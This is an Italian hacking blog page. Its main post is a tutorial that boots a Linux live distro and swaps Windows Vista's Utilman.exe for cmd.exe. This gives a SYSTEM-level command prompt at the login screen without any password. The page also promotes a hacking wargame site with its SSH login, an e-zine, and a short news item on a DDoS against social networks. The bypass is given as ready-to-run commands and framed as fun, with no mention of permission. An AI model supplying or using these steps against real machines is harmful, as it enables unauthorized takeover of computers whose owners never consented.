Windows Vista Authentication Bypass con BackTrack

Come facilmente intuibile dal titolo di questo nuovo articolo, oggi andremo ad effettuare un’attacco al sistema operativo Windows Vista tramite la rinomata distro BackTrack.

Con questo attacco riusciremo a loggarci con l’utente SYSTEM, senza conoscere, e quindi inserire, alcuna password

=========================

Requisiti:

• Un sistema Windows Vista installato
• Una qualsiasi versione di BackTrack avviabile (oppure una qualsiasi distro live con determinati requisiti, vedremo dopo)

=========================

Avviamo il nostro sistema Linux e apriamo una sessione di terminale usando Konsole, XTerm o il vostro emulatore di terminale preferito.

Gli unici comandi che andremo ad eseguire sono dei comandi Unix base, vediamoli:

# cd /mnt/sda1 (in caso l’hard disk su cui è installato Vista sia in sda1)

# cd /Windows/System32 (Mi raccomando: Occhio al case-sensitive)

# mv Utilman.exe Utilman.bak (L’importante è fare in modo che Utilman.exe non esista)

# cp cmd.exe Utilman.exe

Ora non ci resta che riavviare con il comando:

reboot

Avviamo quindi il nostro Windows Vista e quando il sistema ci mostrerà la schermata di Login premiamo Win + U (Win è il tasto con il logo di Windows) e…magia delle magie: Eccoci il nostro interprete dei comandi

A questo punto ci chiedermo in quale utente siamo loggati, quindi digitiamo nel prompt:

whoami

Cioè “Who Am I?” – “Chi sono Io?”. Noteremo con piacere che saremo identificati con l’utente SYSTEM

Ora se vogliamo un ambiente desktop non dobbiamo fare altro che digitare:

explorer.exe

Poi potrete divertirvi quanto volete, con il totale controllo del sistema

=====================================

Procedura con una semplice distro live

=====================================

Se non avete una distribuzione BackTrack per le mani, sarete felici di sapere che questa procedura può essere interamente riprodotta su una qualsiasi distribuzione GNU/Linux, a patto che soddisfi i seguenti requisiti:

• Possibilità di mounting del disco fisso sul quale è installato il sistema Windows Vista
• Supporto a NTFS
• Possibilità di eseguire i comandi unix e quindi avere una shell dei comandi

E questo è quanto. Al prossimo paper

by w0rm

Quante volte avete detto : “Ok, la teoria è bella, ma io ho bisogno di pratica!” ? Immagino tante, e proprio per questo vi sengaliamo un sito veramente interessante : RootHack.org.

RootHack è più di un semplice HackGame, dato che dovrete attaccare delle macchine REALI effettuando tutte le operazioni che avete studiato. I fornitori del servizio garantiscono la vostra riservatezza, a patto che le macchine non vengano in alcun modo danneggiate. Non mi sembra eccessivo

Potete inziare connettendovi tramite SSH all’indirizzo sirens.roothack.org, user wargames, password wargames.

Navigando tra le directory esplorabili troverete un file README che vi illustrerà come muovere i primi passi in RootHack.

Non mi resta che augurarvi buon hacking

UnderAttHack

Rivista digitale di informatica, sicurezza e culture del cyberspazio

Tecnologie, reti, spazi virtuali, sapere collettivo.
Vero o Falso? Zero o Uno?
Bene e Male, Giusto e Sbagliato si scontrano e si fondono.
Modelli di cyberspazio modificano la realtà tangibile
percezioni elettroniche di entità sociali in evoluzione.
L’uomo che crea la macchina e la macchina che forma il pensiero umano.
Siamo noi attori dei processi? O ne siamo assonnati spettatori?
Informazione a milioni di bit al secondo, elaborazione a miliardi di Hertz, algoritmi condizionali e loop decisionali interconnessi.
Siamo più forti, siamo più liberi
Siamo tutti sotto attacco.

Così ci si presenta UnderAttHack, un E-Zine di informatica e sicurezza gestito dal team di HackingEasy. Questo E-Zine molto singolare ha un’importante particolarità : chiunque può, tramite l’invio di una mail, collaborare scrivendo un articolo.

Dando un rapido sguardo possiamo notare immediatamente la struttura essenziale del sito che ci permetterà di consultare l’e-zine gratuitamente, in formato HTML (visibile comodamente da browser) o PDF.

Vi segnaliamo inoltre il bannerino che potete mettere in firma sui forum/siti che frequentate:

<img src="http://img229.imageshack.us/img229/2350/banneruahpg0.gif"/>

Il 6 agosto i più famosi Social Network del mondo, Twitter, Facebook e FriendFeed (si è salvato solo Netlog : D) hanno subito un massiccio attacco DDoS (Denial of Service) da parte di molti crackers.

DDoS contro i social network

Infatti Twitter è andato down per alcune ore mentre Facebook e FriendFeed caricavano pagine web in modo lentissimo : L’attacco DDoS (Distributed Denial of Service) consiste nell’effettuare tramite parecchi computer tante richieste ad un host (in questo caso erano più di uno) fin quando non sono più gestibili le richieste e l’host, quindi, va in sovraccarico.

Un attacco di tale portata a 3 Social Network contemporaneamente necessità l’uso di centinaia e centinaia di computer sparsi in tutto il mondo rendendo così irrintracciabili i pirati informatici. Questo fenomeno è comunemente chiamato BotNet, cioè una rete di computer “zombie” (infettati) che quando richiesto iniziano a bombardare di richieste l’host specificato.

I webmaster di Twitter, Facebook e FriendFeed hanno rilasciato dei commenti sulla vicenda dove spiegano che indagheranno appronfonditamente.

FluxC0de è il nostro portale interamente dedicato all’hacking, alla programmazione. Sul nostro blog troverai interessanti News dal mondo dell’informatica e i nostri paper o tutorials, e sul nostro forum potrai facilmente discutere su argomenti quali : Hacking, Programmazione, Telefonia & Phrehacking, Hardware & PC Modding e tanto altro ancora!